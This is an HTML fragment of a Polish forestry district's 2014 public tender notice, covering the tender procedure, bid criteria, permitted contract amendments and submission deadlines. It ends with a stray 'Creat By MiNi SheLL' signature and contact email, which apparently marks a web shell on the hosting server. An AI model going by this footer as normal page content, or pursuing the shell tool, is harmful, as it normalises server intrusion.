                    technicznym, osobach zdolnych do wykonania zamówienia innych podmiotów
                    niezależnie od charakteru prawnego łączących go z nimi stosunków zobowiązany 
                    udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi
                    do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne
                    zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych 
                    zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Na podstawie art. 144 ust.1 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień
         Publicznych  (Dz.U. z 2013 r. poz. 907 z póz.zm.), Zamawiający dopuszcza
         możliwość wprowadzenia istotnych zmian zawartej umowy w stosunku do treści
         oferty, na podstawie  której dokonano wyboru Wykonawcy, jeżeli wystąpi
         co najmniej jedna z wymienionych niżej  okoliczności oraz zostaną uwzględnione
         opisane poniżej warunki wprowadzenia tych zmian tj.
         1) Terminu wykonania zamówienia:
         a) jeżeli zajdzie konieczność wprowadzenia w dokumentacji projektowej,
             specyfikacjach technicznych wykonania i odbioru robót budowlanych albo
             w innych dokumentach, zmian wywołanych zmianami w przepisach prawa,
             norm i standartów albo zmianami w wiedzy technicznej;
         b) jeżeli zajdzie konieczność wprowadzenia zmian w sposobie wykonania robót
             budowlanych, spowodowanych zmianami w przepisach prawa, norm i standartów                                         
             lub zmianami w wiedzy technicznej lub zmianą funkcji użytkowej oraz
             w przypadku stwierdzenia niezinwentaryzowanych elementów infrastruktury;
         c) na skutek działania siły wyższej (np. klęski żywiołowej), mającego bezpośredni
             wpływ na terminowość wykonywania robót;
         d) w przypadku wystąpienia warunków atmosferycznych uniemożliwiających 
             wykonywanie robót zgodnie z sztuką budowlaną;
         e) jeżeli wystąpią okoliczności, których strony nie mogły przewidzieć, pomimo
             zachowania należytej staranności;
         f) jeżeli konieczność zmiany terminu zakończenia robót wystąpi w następstwie
             okoliczności leżących po stronie Zamawiającego, w szczególności w przypadku
             czasowego wstrzymania robót przez Zamawiającego;
        2) Zmiany zakresu zamówienia powierzonego do wykonania podwykonawcom;
        3) Zmiany osoby  pełniącej funkcję kierownika budowy;
        4) Zmiany formy zabezpieczenia należytego wykonania umowy;
        5) Zmiany danych związanych z obsługa administracyjno-organizacyjną umowy  


                      
                                                                 -  16  -
                          
            (np. zmiana nr rachunku bankowego)
        6) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów 
            między stronami;
           W przypadku wystąpienia którejkolwiek z wymienionych okoliczności, termin 
            realizacji zamówienia ulega odpowiedniemu wydłużeniu o czas niezbędny na
            należyte spełnienie świadczenia, nie dłużej jednak niż czas trwania tych
            okoliczności.
            Wszystkie zmiany dla swojej ważności wymagają formy pisemnej w postaci
            kolejno ponumerowanych aneksów.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.katowice.lasy.gov.pl/rudziniec<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Nadleśnictwo Rudziniec ul. Leśna 7  44-16o Rudziniec.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.07.2014 godzina 12:30, miejsce: Nadleśnictwo Rudziniec ul. Leśna 7 44-160 Rudziniec - Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com